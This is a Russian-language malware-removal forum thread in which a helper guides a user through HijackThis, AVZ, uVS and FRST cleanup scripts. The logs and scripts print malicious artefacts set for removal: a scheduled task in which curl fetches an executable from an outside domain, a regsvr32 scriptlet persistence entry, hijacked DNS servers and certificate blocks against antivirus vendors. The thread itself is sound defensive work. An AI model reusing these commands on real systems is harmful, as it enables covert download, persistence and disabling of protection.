При загрузке компьютера в папке Temp появляется файл начинающийся на g, а окончания названия всегда случайное.Также он создаёт процесс с расширением temp.exe.
При загрузке компьютера в папке Temp появляется файл начинающийся на g, а окончания названия всегда случайное.Также он создаёт процесс с расширением temp.exe.
Уважаемый(ая) noob4321, спасибо за обращение на наш форум!
Помощь при заражении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.
Информация
Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.
Запустите HijackThis, расположенный в папке Autologger и пофиксите (в Windows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора)):Выполните скрипт в AVZ:Код:R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Search Bar] = https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGIjVkxlyIPcoSf2TGNKmBMhWGXvqWwz3Nn-w1WgOgibISP9XojZSAHEWNVWWj7YGSyjV87AgP4gmu5y2Xdm1fxfR4am47aeRULFivg-lD2eeDnQr3ar02haLWPNBlL_zG-RzDTwoubbdmH_NawHRWoF648kNvNoCQsTyEgvHs5keJqY R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Search Page] = https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGIjVkxlyIPcoSf2TGNKmBMhWGXvqWwz3Nn-w1WgOgibISP9XojZSAHEWNVWWj7YGSyjV87AgP4gmu5y2Xdm1fxfR4am47aeRULFivg-lD2eeDnQr3ar02haLWPNBlL_zG-RzDTwoubbdmH_NawHRWoF648kNvNoCQsTyEgvHs5keJqY R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Start Page] = https://%66%65%65%64.%73%6E%61%70%64%6F.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGIjVkxlyIPcoSf2TGNKmBMhWGXvqWwz3Nn-w1WgOgibISP9XojZSAHEWNVWWj7YGSyjV87AgP4gmu5y2Xdm1fxfR4am47aeRUL3AyD1m5EKtCVbbeR3Ygw4ax8HiiptH7G5AYxBxEA3i8y_3j0FcZeqXSoeuz1OD5WnjDmw4g3qNieVAHhXIVAORILlF R0 - HKCU\Software\Microsoft\Internet Explorer\Search: [Default_Search_URL] = https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGIjVkxlyIPcoSf2TGNKmBMhWGXvqWwz3Nn-w1WgOgibISP9XojZSAHEWNVWWj7YGSyjV87AgP4gmu5y2Xdm1fxfR4am47aeRULFivg-lD2eeDnQr3ar02haLWPNBlL_zG-RzDTwoubbdmH_NawHRWoF648kNvNoCQsTyEgvHs5keJqY R1 - HKCU\Software\Microsoft\Internet Explorer\Main: [SearchAssistant] = https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGIjVkxlyIPcoSf2TGNKmBMhWGXvqWwz3Nn-w1WgOgibISP9XojZSAHEWNVWWj7YGSyjV87AgP4gmu5y2Xdm1fxfR4am47aeRULFivg-lD2eeDnQr3ar02haLWPNBlL_zG-RzDTwoubbdmH_NawHRWoF648kNvNoCQsTyEgvHs5keJqYvsUFgYGsVf8Kk&q={searchTerms} 4 - HKLM\..\RunOnce: [NEKIT-PC] = C:\Windows\TEMP\g11CC.tmp.exe O4 - MSConfig\startupreg: GoogleChromeAutoLaunch_1B1C65155E77809584296B047C81E09D [command] = C:\Users\nekit\AppData\Local\Yandex\YandexBrowser\Application\browser.exe --no-startup-window /prefetch:5 (HKCU) (2017/07/12) O4 - User Startup: C:\Users\nekit\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hinata.lnk -> C:\Windows\SysWOW64\regsvr32.exe /u /n /s /i:C:\Users\nekit\AppData\Roaming\persit.sct scrobj.dll O7 - Policy: [Untrusted Certificate] 03D22C9C66915D58C88912B64C1F984B8344EF09 - Comodo Security Solutions, Inc O7 - Policy: [Untrusted Certificate] 0F684EC1163281085C6AF20528878103ACEFCAAB - F-Secure Corporation O7 - Policy: [Untrusted Certificate] 1667908C9E22EFBD0590E088715CC74BE4C60884 - FRISK Software International O7 - Policy: [Untrusted Certificate] 18DEA4EFA93B06AE997D234411F3FD72A677EECE - Bitdefender SRL O7 - Policy: [Untrusted Certificate] 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF - G DATA Software AG O7 - Policy: [Untrusted Certificate] 249BDA38A611CD746A132FA2AF995A2D3C941264 - Malwarebytes Corporation O7 - Policy: [Untrusted Certificate] 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF - Symantec Corporation O7 - Policy: [Untrusted Certificate] 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 - Trend Micro, Inc. O7 - Policy: [Untrusted Certificate] 3353EA609334A9F23A701B9159E30CB6C22D4C59 - Webroot Inc. O7 - Policy: [Untrusted Certificate] 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A - SUPERAntiSpyware.com O7 - Policy: [Untrusted Certificate] 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F - Kaspersky Lab O7 - Policy: [Untrusted Certificate] 3D496FA682E65FC122351EC29B55AB94F3BB03FC - AVG Technologies CZ, s.r.o. O7 - Policy: [Untrusted Certificate] 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 - PC Tools O7 - Policy: [Untrusted Certificate] 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 - K7 Computing Pvt Ltd O7 - Policy: [Untrusted Certificate] 4420C99742DF11DD0795BC15B7B0ABF090DC84DF - Doctor Web Ltd. O7 - Policy: [Untrusted Certificate] 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF - Emsisoft Ltd O7 - Policy: [Untrusted Certificate] 5240AB5B05D11B37900AC7712A3C6AE42F377C8C - Check Point Software Technologies Ltd. O7 - Policy: [Untrusted Certificate] 5DD3D41810F28B2A13E9A004E6412061E28FA48D - Emsisoft Ltd O7 - Policy: [Untrusted Certificate] 7457A3793086DBB58B3858D6476889E3311E550E - K7 Computing Pvt Ltd O7 - Policy: [Untrusted Certificate] 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 - BullGuard Ltd O7 - Policy: [Untrusted Certificate] 775B373B33B9D15B58BC02B184704332B97C3CAF - McAfee, Inc. O7 - Policy: [Untrusted Certificate] 872CD334B7E7B3C3D1C6114CD6B221026D505EAB - Comodo Security Solutions, Inc. O7 - Policy: [Untrusted Certificate] 88AD5DFE24126872B33175D1778687B642323ACF - McAfee, Inc. O7 - Policy: [Untrusted Certificate] 9132E8B079D080E01D52631690BE18EBC2347C1E - Adaware Software O7 - Policy: [Untrusted Certificate] 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 - Safer Networking Ltd. O7 - Policy: [Untrusted Certificate] 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 - Webroot Inc. O7 - Policy: [Untrusted Certificate] 9C43F665E690AB4D486D4717B456C5554D4BCEB5 - ThreatTrack Security, Inc. O7 - Policy: [Untrusted Certificate] 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 - CURIOLAB S.M.B.A. O7 - Policy: [Untrusted Certificate] A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 - Avira Operations GmbH & Co. KG O7 - Policy: [Untrusted Certificate] A5341949ABE1407DD7BF7DFE75460D9608FBC309 - BullGuard Ltd. O7 - Policy: [Untrusted Certificate] A59CC32724DD07A6FC33F7806945481A2D13CA2F - ESET, spol. s r.o. O7 - Policy: [Untrusted Certificate] AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 - AVG Technologies CZ, s.r.o. O7 - Policy: [Untrusted Certificate] AD4C5429E10F4FF6C01840C20ABA344D7401209F - AVAST Software s.r.o. O7 - Policy: [Untrusted Certificate] AD96BB64BA36379D2E354660780C2067B81DA2E0 - Symantec Corporation O7 - Policy: [Untrusted Certificate] B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 - Malwarebytes Corporation O7 - Policy: [Untrusted Certificate] CDC37C22FE9272D8F2610206AD397A45040326B8 - Trend Micro, Inc. O7 - Policy: [Untrusted Certificate] D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 - Kaspersky Lab O7 - Policy: [Untrusted Certificate] DB303C9B61282DE525DC754A535CA2D6A9BD3D87 - ThreatTrack Security, Inc. O7 - Policy: [Untrusted Certificate] DB77E5CFEC34459146748B667C97B185619251BA - AVAST Software s.r.o. O7 - Policy: [Untrusted Certificate] E22240E837B52E691C71DF248F12D27F96441C00 - Total Defense, Inc. O7 - Policy: [Untrusted Certificate] E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF - AVG Technologies CZ, s.r.o. O7 - Policy: [Untrusted Certificate] ED841A61C0F76025598421BC1B00E24189E68D54 - Bitdefender SRL O7 - Policy: [Untrusted Certificate] F83099622B4A9F72CB5081F742164AD1B8D048C9 - ESET, spol. s r.o. O7 - Policy: [Untrusted Certificate] FBB42F089AF2D570F2BF6F493D107A3255A9BB1A - Panda Security S.L O7 - Policy: [Untrusted Certificate] FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 - Doctor Web Ltd. O7 - Policy: [Untrusted Certificate] Fix all items from the log O17 - HKLM\System\CCS\Services\Tcpip\..\{0E7C49D1-3E3F-4D64-A4D4-22C9127DE602}: [NameServer] = 82.163.142.178 O17 - HKLM\System\CCS\Services\Tcpip\..\{0E7C49D1-3E3F-4D64-A4D4-22C9127DE602}: [NameServer] = 82.163.143.176 O17 - HKLM\System\CCS\Services\Tcpip\Parameters: [NameServer] = 82.163.142.178 O17 - HKLM\System\CCS\Services\Tcpip\Parameters: [NameServer] = 82.163.143.176 O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{0E7C49D1-3E3F-4D64-A4D4-22C9127DE602}: [NameServer] = 82.163.142.178 O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{0E7C49D1-3E3F-4D64-A4D4-22C9127DE602}: [NameServer] = 82.163.143.176 O17 - HKLM\System\ControlSet002\Services\Tcpip\Parameters: [NameServer] = 82.163.142.178 O17 - HKLM\System\ControlSet002\Services\Tcpip\Parameters: [NameServer] = 82.163.143.176 O22 - Task (Job): ReimageUpdater.job - C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe run_task O22 - Task: Guard - C:\Program Files (x86)\System Native\Main Services\Guard.exe (file missing) O22 - Task: MSI - C:\Users\nekit\AppData\Roaming\Microsoft\msi.exe cnt=2 fts="Downloads\feyk-stim___.exe" (file missing) O22 - Task: curl - C:\Users\nekit\AppData\Roaming\curl\curl_7_54.exe -f -L "http://amtomil.ru/f.exe" -o "C:\Users\nekit\AppData\Roaming\curl\curl.exe" (file missing) O22 - Task: curls - C:\Users\nekit\AppData\Roaming\curl\curl.exe (file missing) O23 - Service S2: Icon Codec Service Apllication - (Icon Codec Service) - C:\Users\nekit\AppData\Local\Temp\4C6D.tmp.exe (file missing) -serviceКомпьютер перезагрузится.Код:begin TerminateProcessByName('C:\Windows\Temp\g11CD.tmp.exe'); QuarantineFile('C:\Users\nekit\AppData\Roaming\curl\curl.exe', ''); QuarantineFile('C:\Users\nekit\AppData\Roaming\curl\curl_7_54.exe', ''); QuarantineFile('C:\Users\nekit\AppData\Roaming\Microsoft\msi.exe', ''); QuarantineFile('C:\Windows\microsoft\svchost.exe', ''); QuarantineFile('C:\Windows\TEMP\g11CC.tmp.exe', ''); QuarantineFile('C:\Windows\Temp\g11CD.tmp.exe', ''); QuarantineFileF('C:\Windows\Temp', '*.tmp.exe', false, '', 0, 0); DeleteFile('C:\Program Files\Reimage\Reimage', '32'); DeleteFile('C:\Users\nekit\AppData\Roaming\curl\curl.exe', '32'); DeleteFile('C:\Users\nekit\AppData\Roaming\curl\curl_7_54.exe', '32'); DeleteFile('C:\Users\nekit\AppData\Roaming\Microsoft\msi.exe', '32'); DeleteFile('C:\Windows\microsoft\svchost.exe', '32'); DeleteFile('C:\Windows\TEMP\g11CC.tmp.exe', '32'); DeleteFile('C:\Windows\Temp\g11CD.tmp.exe', '32'); DeleteFile('http:\amtomil.ru\f.exe', '32'); DeleteFile('ReimageUpdater.job', '64'); ExecuteFile('schtasks.exe', '/delete /TN "curl" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "curls" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "MSI" /F', 0, 15000, true); DeleteFileMask('c:\program files\reimage', '*', true); DeleteFileMask('c:\users\nekit\appdata\roaming\curl', '*', true); DeleteFileMask('C:\Windows\Temp', '*.tmp.exe', true); DeleteDirectory('c:\program files\reimage'); DeleteDirectory('c:\users\nekit\appdata\roaming\curl'); RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\RunOnce', 'NEKIT-PC'); CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip'); ExecuteSysClean; ExecuteRepair(2); ExecuteRepair(3); ExecuteRepair(4); ExecuteWizard('SCU', 2, 2, true); RebootWindows(true); end.
В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.
Устраняйте уязвимость, которую используют в т. ч. нашумевшие шифровальщики WannaCry и Petya, критический патч - по ссылке отсюда: http://www.catalog.update.microsoft....px?q=KB4012212
Скачайте утилиту Universal Virus Sniffer отсюда и сделайте полный образ автозапуска uVS.
WBR,
Vadim
Всё сделано.Файл в карантин отправил, утилиту скачал образ автозапуска сделал, единственное только при установке патч он выдал ошибка что на этот компьютер установится не может
вот образ
Скопируйте скрипт ниже в буфер обмена (выделить и нажать Ctrl-C):Запустите файл start.exe из папки с uVS, выберите "Запустить под текущим пользователем", в главном меню программы - Скрипты -> выполнить скрипт из буфера обмена.Код:;uVS v4.0.10 [http://dsrt.dyndns.org] ;Target OS: NTv6.1 v400c OFFSGNSAVE zoo %SystemDrive%\PROGRAM FILES\FREE MP3 TURBASHPACK\FREE MP3 TURBASHPACK.DLL addsgn BA6F9BD21DE149A710CAAE329EC9D505258AFCF6FDF057FB418B2C0DAE298EDC6F9E877306DCC96D1FC80DD3623EA167E7DFE89AED79B02C61FCE00BFF8D7657 48 TR/Wdfload.xurqu [Avira] 7 zoo %SystemRoot%\TEMP\G343A.TMP.EXE addsgn BA6F9BB2BDE54A720B9C2D754C2164FBDA75303AC9A957FB69E38D315559AE4F235F488E76DC9CBFE981F095FC0E49FA7D37EA8AAA25F8A7EE3F27EBE75DE1BF 15 Trojan.BtcMine.2104 [DrWeb] 7 zoo %SystemRoot%\TEMP\G1812.TMP.EXE addsgn BA6F9BB2BDFD4B720B9C2D754C2164FBDA75303AC9A957FB69E38D3789E5B8B336FC2B573E1D1682D4955E774616B6EF9937E8721D5178962473A4EF8F85E653 8 TR/Wdfload.vxodr [Avira] 7 chklst delvir deldir %SystemDrive%\PROGRAM FILES\FREE MP3 TURBASHPACK delref %SystemDrive%\PROGRAMDATA\{0D3D5C13-612C-1}\{0D3D5C13-612C-1}.D delref %SystemDrive%\PROGRAMDATA\{1FCD217D-012C-0}\{1FCD217D-012C-0}.D delref %SystemDrive%\PROGRAMDATA\{32292181-712C-0}\{32292181-712C-0}.D apply deltmp czoo restart
Компьютер перезагрузится.
В папке с uVS появится архив ZIP с именем, начинающимся с ZOO_ и далее из даты и времени, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.
В папке с UVS будет лог выполнения скрипта, текстовый файл с именем из даты и времени выполнения, прикрепите его с своему сообщению.
Загрузите, распакуйте на Рабочий стол и запустите SecurityCheck by glax24 & Severnyj.
Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запуск от имени администратора (если Вы используете Windows Vista/7/8/10).
Если увидите предупреждение от фаервола относительно программы SecurityCheck, не блокируйте ее работу.
Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt;
Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt.
Приложите этот файл к своему следующему сообщению.
WBR,
Vadim
вот лог uVS
- - - - -Добавлено - - - - -
вот лог SecurityCheck
Эти критические патчи установите обязательно, иначе лечиться можно до бесконечности.HotFix KB3115858 Внимание! Скачать обновления
HotFix KB3140735 Внимание! Скачать обновления
HotFix KB3138910 Внимание! Скачать обновления
HotFix KB3138962 Внимание! Скачать обновления
HotFix KB3145739 Внимание! Скачать обновления
HotFix KB3146963 Внимание! Скачать обновления
HotFix KB3156013 Внимание! Скачать обновления
HotFix KB3156016 Внимание! Скачать обновления
HotFix KB3156019 Внимание! Скачать обновления
HotFix KB3155178 Внимание! Скачать обновления
HotFix KB3153171 Внимание! Скачать обновления
HotFix KB3170455 Внимание! Скачать обновления
HotFix KB3178034 Внимание! Скачать обновления
HotFix KB3185911 Внимание! Скачать обновления
HotFix KB3184122 Внимание! Скачать обновления
HotFix KB3192391 Внимание! Скачать обновления
HotFix KB3197867 Внимание! Скачать обновления
HotFix KB3205394 Внимание! Скачать обновления
HotFix KB4012212 Внимание! Скачать обновления
HotFix KB4019263 Внимание! Скачать обновления
HotFix KB4022722 Внимание! Скачать обновления
HotFix KB4015546 Внимание! Скачать обновления
HotFix KB4025337 Внимание! Скачать обновления
HotFix KB4034679 Внимание! Скачать обновления
HotFix KB4041678 Внимание! Скачать обновления
HotFix KB4056894 Внимание! Скачать обновления
HotFix KB4056897 Внимание! Скачать обновления
Удалите это недоразумение.GRIZZLY Antivirus (включен и устарел)
Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.
Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).
WBR,
Vadim
патчи установил, проверку сделал.Процесс вроде пропал
Откройте Блокнот (Старт =>Программы => Стандартные => Блокнот). Скопируйте в него следующий код:и сохраните как fixlist.txt в папку с Farbar Recovery Scan Tool. При сохранении выберите кодировку Юникод!Код:CreateRestorePoint: HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions) <==== ATTENTION HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) <==== ATTENTION HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (FRISK Software International/F-Prot) <==== ATTENTION HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL) <==== ATTENTION HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (G DATA Software AG) <==== ATTENTION HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) <==== ATTENTION HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Symantec Corporation) <==== ATTENTION HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) <==== ATTENTION HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Webroot Inc.) <==== ATTENTION HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) <==== ATTENTION HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab) <==== ATTENTION HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) <==== ATTENTION HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools) <==== ATTENTION HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) <==== ATTENTION HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.) <==== ATTENTION HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd) <==== ATTENTION HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.) <==== ATTENTION HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) <==== ATTENTION HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (K7 Computing Pvt Ltd) <==== ATTENTION HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) <==== ATTENTION HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee) <==== ATTENTION HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) <==== ATTENTION HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee) <==== ATTENTION HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) <==== ATTENTION HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.) <==== ATTENTION HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) <==== ATTENTION HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (ThreatTrack Security) <==== ATTENTION HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (CURIOLAB S.M.B.A.) <==== ATTENTION HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) <==== ATTENTION HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (BullGuard Ltd) <==== ATTENTION HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) <==== ATTENTION HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ) <==== ATTENTION HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) <==== ATTENTION HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation) <==== ATTENTION HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation) <==== ATTENTION HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Trend Micro) <==== ATTENTION HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) <==== ATTENTION HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security) <==== ATTENTION HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) <==== ATTENTION HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Total Defense, Inc.) <==== ATTENTION HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) <==== ATTENTION HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL) <==== ATTENTION HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) <==== ATTENTION HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L) <==== ATTENTION HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) <==== ATTENTION HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION GroupPolicy: Restriction - Windows Defender <==== ATTENTION GroupPolicy\User: Restriction <==== ATTENTION 2017-12-27 17:44 - 2017-12-27 17:44 - 000000037 ___SH () C:\Users\nekit\AppData\Local\20986331705021ca58edc424.96250074 2018-01-14 10:13 - 2018-01-14 10:13 - 007563264 _____ () C:\Users\nekit\AppData\Local\agent.dat 2018-01-14 10:13 - 2018-01-14 10:13 - 000070800 _____ () C:\Users\nekit\AppData\Local\Config.xml 2018-01-14 09:58 - 2018-01-14 09:58 - 000140800 _____ () C:\Users\nekit\AppData\Local\installer.dat 2018-01-14 10:13 - 2018-01-14 10:13 - 001980097 _____ () C:\Users\nekit\AppData\Local\Keyplus.tst 2018-01-14 10:13 - 2018-01-14 10:13 - 000005568 _____ () C:\Users\nekit\AppData\Local\md.xml 2018-01-14 10:13 - 2018-01-14 10:13 - 000126464 _____ () C:\Users\nekit\AppData\Local\noah.dat 2018-02-09 15:43 - 2018-02-09 15:43 - 000000759 _____ () C:\Users\nekit\AppData\Local\uBar.lnk 2018-01-14 10:14 - 2018-01-14 10:14 - 001895384 _____ () C:\Users\nekit\AppData\Local\Vivasaotex.bin Hosts: Reboot:
Отключите до перезагрузки антивирус, закройте все браузеры, в FRST нажмите один раз Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.
WBR,
Vadim
вот файл
Теперь можете удалить GRIZZLY Антивирус и установить нормальный.
WBR,
Vadim
Статистика проведенного лечения:
- Получено карантинов: 2
- Обработано файлов: 4
- В ходе лечения обнаружены вредоносные программы:
- c:\windows\microsoft\svchost.exe - Trojan.Win32.SelfDel.fzzy
- c:\windows\temp\g11cd.tmp.exe - Trojan.Win32.Vehidis.xis
- \free mp3 turbashpack.dll._b862e9116a873b40abc4b39b11dac1a03 51811f9 - HEUR:Trojan.Win32.Generic
Уважаемый(ая) noob4321, наши специалисты оказали Вам всю возможную помощь по вашему обращению.
В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:
Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:
Надеемся больше никогда не увидеть ваш компьютер зараженным!
Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.